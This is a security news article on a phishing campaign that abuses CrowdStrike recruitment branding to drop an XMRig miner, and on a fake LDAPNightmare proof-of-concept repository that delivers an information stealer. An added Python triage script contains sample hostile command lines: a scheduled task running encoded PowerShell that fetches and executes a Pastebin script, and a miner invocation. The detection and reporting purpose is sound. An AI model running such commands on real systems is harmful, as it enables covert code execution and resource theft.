Cybersecurity firm CrowdStrike is warning of a phishing campaign that exploits its own branding to distribute a cryptocurrency miner disguised as an employee CRM application as part of a supposed recruitment process.
“The attack begins with a phishing email impersonating CrowdStrike recruitment, directing recipients to a malicious website,” the company said. “Victims are prompted to download and run a fake application, which serves as a downloader for the cryptominer XMRig.”
The Texas-based firm said it discovered the malicious campaign on January 7, 2025, and that it is “aware of scams involving false offers of employment with CrowdStrike.”
The phishing email lures recipients by claiming that they have been shortlisted for the next stage of the hiring process for a junior developer role, and that they need to join a call with the recruitment team by downloading a customer relationship management (CRM) application provided via the embedded link.
The downloaded binary, once launched, performs a series of checks to evade detection and analysis before fetching the next-stage payloads.
These checks include detecting the presence of a debugger and scanning the list of running processes for malware analysis or virtualization tools. They also verify that the system has a certain number of active processes and that the CPU has at least two cores.
Should the host satisfy all the criteria, an error message about a failed installation is displayed to the user, while the XMRig miner is covertly downloaded from GitHub and its corresponding configuration from another server (“93.115.172[.]41”) in the background.
“The malware then runs the XMRig miner, using the command-line arguments inside the downloaded configuration text file,” CrowdStrike said, adding that the executable establishes persistence on the machine by adding a Windows batch script to the Start Menu Startup folder, which is responsible for launching the miner.
Fake LDAPNightmare PoC Targets Security Researchers
The development comes as Trend Micro revealed that a fake proof-of-concept (PoC) for a recently disclosed security flaw in Microsoft's Windows Lightweight Directory Access Protocol (LDAP) – CVE-2024-49113 (aka LDAPNightmare) – is being used to lure security researchers into downloading an information stealer.
The malicious GitHub repository in question – github[.]com/YoonJae-rep/CVE-2024-49113 (now taken down) – is said to be a fork of the original repository from SafeBreach Labs hosting the legitimate PoC.
The counterfeit repository, however, replaces the exploit-related files with a binary named “poc.exe” that, when run, drops a PowerShell script to create a scheduled task that executes a Base64-encoded script. The decoded script is then used to download another script from Pastebin.
The final-stage malware is a stealer that collects the machine's public IP address, system metadata, process list, directory listings, network IP addresses, network adapters, and installed updates.
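As an added triage example (not CrowdStrike's or Trend Micro's code, and not drawn from either report), the following Python scans a few constructed endpoint events for the behaviours the two campaigns above share: a scheduled task running Base64-encoded PowerShell that fetches a second stage from Pastebin (the fake PoC), and a batch script dropped into the Start Menu Startup folder plus an XMRig-style miner command line (the recruitment lure). The event format, file names, paths, pool address and Pastebin URL are assumptions for illustration, not indicators from the article.

```python
"""Triage constructed Windows endpoint events for: an encoded-PowerShell scheduled
task pulling a second stage from a paste site, a batch script in the Startup
folder, and an XMRig-style miner command line. Added example; nothing here is
an indicator from the CrowdStrike or Trend Micro reports."""
import base64
import re

# Constructed second-stage downloader, encoded the way PowerShell's
# -EncodedCommand expects it (UTF-16LE, then Base64). The URL is a placeholder.
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/example')"
ENCODED_STAGE2 = base64.b64encode(STAGE2_SCRIPT.encode("utf-16le")).decode()

# Constructed events; the shape loosely follows a Sysmon-style feed (not real data).
SAMPLE_EVENTS = [
    {"event": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /tn Updater /sc minute /mo 10 '
                f'/tr "powershell.exe -nop -w hidden -EncodedCommand {ENCODED_STAGE2}"'},
    {"event": "file", "path": r"C:\Users\dev\AppData\Roaming\Microsoft\Windows"
                              r"\Start Menu\Programs\Startup\crm_launch.bat"},
    {"event": "process", "image": r"C:\Users\dev\AppData\Local\Temp\crm_update.exe",
     "cmdline": "crm_update.exe -o stratum+tcp://pool.example:3333 -u 4wallet -k --donate-level=1"},
    # Benign look-alikes: an ordinary script run, and curl using -u/-o for other purposes.
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"event": "process", "image": r"C:\tools\curl.exe",
     "cmdline": "curl.exe -u admin:secret -o report.bin https://intranet.example/report"},
]

# PowerShell accepts -EncodedCommand and its abbreviations -enc, -ec, -e.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
STARTUP_SCRIPT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:bat|cmd)$", re.I)
DOWNLOAD_HINTS = ("pastebin.com", "downloadstring", "downloadfile", "invoke-webrequest", "iwr ")
# A pool target: stratum scheme, or a bare host:port as the -o value.
POOL_VALUE = re.compile(r"stratum\+(?:tcp|ssl)://|:\d{2,5}$", re.I)
MINER_FLAGS = {"-o", "--url", "-u", "--user", "-k", "--keepalive", "--donate-level", "--coin"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _flag_values(tokens, names):
    """Values of the given flags, accepting both '--flag=value' and '--flag value'."""
    out = []
    for i, tok in enumerate(tokens):
        key, _, val = tok.partition("=")
        if key.lower() in names:
            out.append(val or (tokens[i + 1] if i + 1 < len(tokens) else ""))
    return out


def looks_like_miner(cmdline):
    """XMRig-style invocation: a pool-looking -o/--url value plus another miner flag.
    Requiring a pool-like value keeps tools such as curl (-u/-o) from matching."""
    tokens = cmdline.split()
    flags = {t.partition("=")[0].lower() for t in tokens} & MINER_FLAGS
    pools = [v for v in _flag_values(tokens, {"-o", "--url"}) if POOL_VALUE.search(v)]
    return bool(pools) and len(flags) >= 2


def triage(events):
    """Return (rule, detail) findings, in event order, for the events that match."""
    findings = []
    for ev in events:
        if ev["event"] == "file" and STARTUP_SCRIPT.search(ev["path"]):
            findings.append(("startup_folder_script", ev["path"]))
            continue
        if ev["event"] != "process":
            continue
        cmd = ev["cmdline"]
        decoded = decode_encoded_command(cmd)
        if decoded is not None and any(h in decoded.lower() for h in DOWNLOAD_HINTS):
            rule = "schtasks_encoded_downloader" if "schtasks" in cmd.lower() else "encoded_downloader"
            findings.append((rule, decoded))
        if looks_like_miner(cmd):
            findings.append(("xmrig_style_cmdline", cmd))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Two details matter in practice: PowerShell's -EncodedCommand is Base64 over UTF-16LE text, so decoding it as UTF-8 yields garbage and misses the download cmdlet; and XMRig's short flags (-o, -u, -k) collide with everyday tools, which is why the miner rule insists on a stratum scheme or host:port in the -o value rather than on the flags alone. The rules above are illustrative and, like any command-line heuristics, should be tuned against your own baseline before alerting on them.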
“Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” security researcher Sarah Pearl Camiling said.